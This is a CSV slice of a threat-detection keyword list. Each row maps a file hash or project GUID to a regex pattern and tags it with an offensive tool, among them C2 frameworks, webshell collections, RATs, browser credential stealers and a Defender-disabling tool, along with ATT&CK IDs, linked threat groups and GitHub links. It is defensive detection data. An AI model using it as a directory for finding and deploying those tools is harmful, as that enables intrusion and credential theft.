"*9941d3f3192d927be91b38a3d13e40aebe91768185bc237ef798ae20f78dd952*",".{0,1000}9941d3f3192d927be91b38a3d13e40aebe91768185bc237ef798ae20f78dd952.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31650"
"*994377bab9392a6bac39023cd24df98efbb668cef42ff5bbd709a165fc7a3fe3*",".{0,1000}994377bab9392a6bac39023cd24df98efbb668cef42ff5bbd709a165fc7a3fe3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31651"
"*994ed2ac2d66ee84fae1b9b57e606ddd876ad714c3fb7a4a882c10da7d0b2332*",".{0,1000}994ed2ac2d66ee84fae1b9b57e606ddd876ad714c3fb7a4a882c10da7d0b2332.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31652"
"*9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae*",".{0,1000}9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","#filehash","N/A","10","","N/A","","","","31653"
"*995c3ae92109046bd3bc58025b09d449a695a82b1bf5102b96091500419aabdb*",".{0,1000}995c3ae92109046bd3bc58025b09d449a695a82b1bf5102b96091500419aabdb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31654"
"*995e755827bf8c1908e64d40a7851e05706b89e41dee63037e5c4be0b61f113e*",".{0,1000}995e755827bf8c1908e64d40a7851e05706b89e41dee63037e5c4be0b61f113e.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","31656"
"*995f304132e68eb63d3901bb9e672853eb36859aece625983c4ed690ccf2bcd8*",".{0,1000}995f304132e68eb63d3901bb9e672853eb36859aece625983c4ed690ccf2bcd8.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","31657"
"*9961a0915b6362a73731987d5fc72db0ff44f744af9513ebe8e9935cd48709b8*",".{0,1000}9961a0915b6362a73731987d5fc72db0ff44f744af9513ebe8e9935cd48709b8.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","31658"
"*9968434b0a2d9a4fbc85a732f8b5feb3937a9851e7eb4491966747ea188746da*",".{0,1000}9968434b0a2d9a4fbc85a732f8b5feb3937a9851e7eb4491966747ea188746da.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31659"
"*996b73993b6dfdb1d34ab51c5c36dbae12cae353cfab25cbf14b6d974613cdef*",".{0,1000}996b73993b6dfdb1d34ab51c5c36dbae12cae353cfab25cbf14b6d974613cdef.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31660"
"*996d133f79b2762f547dcd6900326835517586359ffe5f443c40336983a9a2e7*",".{0,1000}996d133f79b2762f547dcd6900326835517586359ffe5f443c40336983a9a2e7.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","#filehash","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","31661"
"*996e6455c47cdc9a046beeea068f06a9fe2c88d45d13fd055145aadecf23657e*",".{0,1000}996e6455c47cdc9a046beeea068f06a9fe2c88d45d13fd055145aadecf23657e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31662"
"*996e7473634a2b894f6e154073d780b12f9ef1b8f1471bb945c7c2cf1c56010a*",".{0,1000}996e7473634a2b894f6e154073d780b12f9ef1b8f1471bb945c7c2cf1c56010a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31663"
"*99775a584cbe0d578bfe061143714ca20bf561703c106508642308097c50270a*",".{0,1000}99775a584cbe0d578bfe061143714ca20bf561703c106508642308097c50270a.{0,1000}","offensive_tool_keyword","Invoke-s4u2self","A tool that abuses s4u2self to gain access to remote hosts","T1550.002 - T1557.001","TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-s4u2self","1","0","#filehash","N/A","9","1","5","2","2025-02-13T16:27:51Z","2023-09-14T13:31:05Z","31667"
"*997969303538ff70c0e90e33789b0ef3da25556349c7017aac86dd1ad3b9264d*",".{0,1000}997969303538ff70c0e90e33789b0ef3da25556349c7017aac86dd1ad3b9264d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31668"
"*997cd811395cfa507c03ba12937f1b8b767f03c146de3771f3fdf66ed2f821c1*",".{0,1000}997cd811395cfa507c03ba12937f1b8b767f03c146de3771f3fdf66ed2f821c1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31669"
"*9980d0e503ffda2d4e254f2039bb6c5d7534d107178a2b4d871685ce6a899c05*",".{0,1000}9980d0e503ffda2d4e254f2039bb6c5d7534d107178a2b4d871685ce6a899c05.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","31671"
"*99852761bd4acc0025c07c147c56caa540b7731be755254e9c85b82f25e08057*",".{0,1000}99852761bd4acc0025c07c147c56caa540b7731be755254e9c85b82f25e08057.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31673"
"*998bc352eb5e3500805741cc3a82c1b9bccc3f66e9512e61f83a9d98850df16d*",".{0,1000}998bc352eb5e3500805741cc3a82c1b9bccc3f66e9512e61f83a9d98850df16d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31674"
"*9994297041105099a5d6870a6d0f1ac5f53035758b053349a76007a3d74ff93d*",".{0,1000}9994297041105099a5d6870a6d0f1ac5f53035758b053349a76007a3d74ff93d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31675"
"*99a0e78b14a0147999489e76b275e0a4503b03ed682cb382338a19472123b74d*",".{0,1000}99a0e78b14a0147999489e76b275e0a4503b03ed682cb382338a19472123b74d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31676"
"*99a342f4ec5b86e7d657a933f5f56aeccd9f540193501b3fc6d6c8cac8c4bde4*",".{0,1000}99a342f4ec5b86e7d657a933f5f56aeccd9f540193501b3fc6d6c8cac8c4bde4.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31677"
"*99a5f42e-60a8-4f1e-9dff-35443b972707*",".{0,1000}99a5f42e\-60a8\-4f1e\-9dff\-35443b972707.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","0","#GUIDProject","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","31678"
"*99a69aea8e1d16454978e00c72b8cf8515faff75c5ffa3f42bc28ee0d51b1252*",".{0,1000}99a69aea8e1d16454978e00c72b8cf8515faff75c5ffa3f42bc28ee0d51b1252.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","31679"
"*99ab49eb94283378c7390bae6943b7b699ebd2ef3d560e5892967559e9429b7b*",".{0,1000}99ab49eb94283378c7390bae6943b7b699ebd2ef3d560e5892967559e9429b7b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31680"
"*99ac2e0be445506852788ae9ed8f2deaecd39da027818c4530206ca9695e2002*",".{0,1000}99ac2e0be445506852788ae9ed8f2deaecd39da027818c4530206ca9695e2002.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31681"
"*99ac9fc0ce4d52878179cfaf785234760ccdd11447fc596f3b04a2499eb31940*",".{0,1000}99ac9fc0ce4d52878179cfaf785234760ccdd11447fc596f3b04a2499eb31940.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","31682"
"*99b12a9b146fcbb55353957845dd82e4d809b7626a6438fa46df5c1ba315c45d*",".{0,1000}99b12a9b146fcbb55353957845dd82e4d809b7626a6438fa46df5c1ba315c45d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31683"
"*99b151997a57f29a3e3436bb4ebbe4357219ae0694a9ae6561afa2da568a0768*",".{0,1000}99b151997a57f29a3e3436bb4ebbe4357219ae0694a9ae6561afa2da568a0768.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31684"
"*99b685e2a57dbbdb0b53689aec5eef525a632c9ea00a5a16adb939387bf5a4da*",".{0,1000}99b685e2a57dbbdb0b53689aec5eef525a632c9ea00a5a16adb939387bf5a4da.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","#filehash","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","31685"
"*99bedbdf28a0b90732b830ce18672ea3b5367b57bf0366714fefaa5d5e2d46f5*",".{0,1000}99bedbdf28a0b90732b830ce18672ea3b5367b57bf0366714fefaa5d5e2d46f5.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","31686"
"*99c32fc0bd5b4fecb91c3774095bf610066c43596b34a0228f7ef3cb6ff39e05*",".{0,1000}99c32fc0bd5b4fecb91c3774095bf610066c43596b34a0228f7ef3cb6ff39e05.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","31687"
"*99d336f5850bb8ce58273fb3cc8f5e2724769c0ff982601c16569e74da42da52*",".{0,1000}99d336f5850bb8ce58273fb3cc8f5e2724769c0ff982601c16569e74da42da52.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31688"
"*99db1f18db645ee556d2805cc85df6e31710e7a3a9a3abe4340e9acd61853e1c*",".{0,1000}99db1f18db645ee556d2805cc85df6e31710e7a3a9a3abe4340e9acd61853e1c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31690"
"*99DDC600-3E6F-435E-89DF-74439FA68061*",".{0,1000}99DDC600\-3E6F\-435E\-89DF\-74439FA68061.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#GUIDproject","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","31691"
"*99df113d5d44e960f503152ba57985e95e20d3491f291046eb091bb0efbc327a*",".{0,1000}99df113d5d44e960f503152ba57985e95e20d3491f291046eb091bb0efbc327a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31692"
"*99df34900abf7cfbf9dfa5d8f04b8693175e0e9a4e79a85677f393232bad0e95*",".{0,1000}99df34900abf7cfbf9dfa5d8f04b8693175e0e9a4e79a85677f393232bad0e95.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31693"
"*99e25d4179b7a0419d07f671ab86f25a86582e256e0862fc431eb7f93cfb3ced*",".{0,1000}99e25d4179b7a0419d07f671ab86f25a86582e256e0862fc431eb7f93cfb3ced.{0,1000}","offensive_tool_keyword","OpenChromeDumps","OpenChrome Dump used with GrabChrome for credential access","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Yanluowang - Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","31695"
"*99E40E7F-00A4-4FB1-9441-B05A56C47C08*",".{0,1000}99E40E7F\-00A4\-4FB1\-9441\-B05A56C47C08.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","0","#GUIDproject","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","31697"
"*99eb7ac696d8a296728e64853eed90941ca96c597e2c55e4fe7eac06b7aac152*",".{0,1000}99eb7ac696d8a296728e64853eed90941ca96c597e2c55e4fe7eac06b7aac152.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31699"
"*99f14934d82a3db78f0f68017c079ec04dedddc5890bf5ce5194dd30801f779d*",".{0,1000}99f14934d82a3db78f0f68017c079ec04dedddc5890bf5ce5194dd30801f779d.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","31701"
"*99fe09aeebf1700973742ff24b0d99708503e8f584354b3c8ec784ee92c0ec4d*",".{0,1000}99fe09aeebf1700973742ff24b0d99708503e8f584354b3c8ec784ee92c0ec4d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31703"
"*9a0023406283d9856b07b2d39b4444130001f86131841df2eba206f0ae379b6c*",".{0,1000}9a0023406283d9856b07b2d39b4444130001f86131841df2eba206f0ae379b6c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31704"
"*9a0281a17a7ed9d95de46360406707d3b6ad20af4e3826726cc0f6a70e4496ab*",".{0,1000}9a0281a17a7ed9d95de46360406707d3b6ad20af4e3826726cc0f6a70e4496ab.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31705"
"*9a0c1767ec9ea7e8fb94abee10e7094e6952248671ef5977413dc2a8cbdd20c0*",".{0,1000}9a0c1767ec9ea7e8fb94abee10e7094e6952248671ef5977413dc2a8cbdd20c0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31706"
"*9a0da3eeb072abdcdce6774d9eb431a2be86b03c3a82e34c0cf464f8150c4e2e*",".{0,1000}9a0da3eeb072abdcdce6774d9eb431a2be86b03c3a82e34c0cf464f8150c4e2e.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","31707"
"*9a13e576203799161d672251815bf9f34a428af3a58787c01eb73c99c1436eac*",".{0,1000}9a13e576203799161d672251815bf9f34a428af3a58787c01eb73c99c1436eac.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","31709"
"*9a193c64e8f1aceb242bf7435f04279b140e19273a2c7c0ff99561fd7abd9652*",".{0,1000}9a193c64e8f1aceb242bf7435f04279b140e19273a2c7c0ff99561fd7abd9652.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31710"
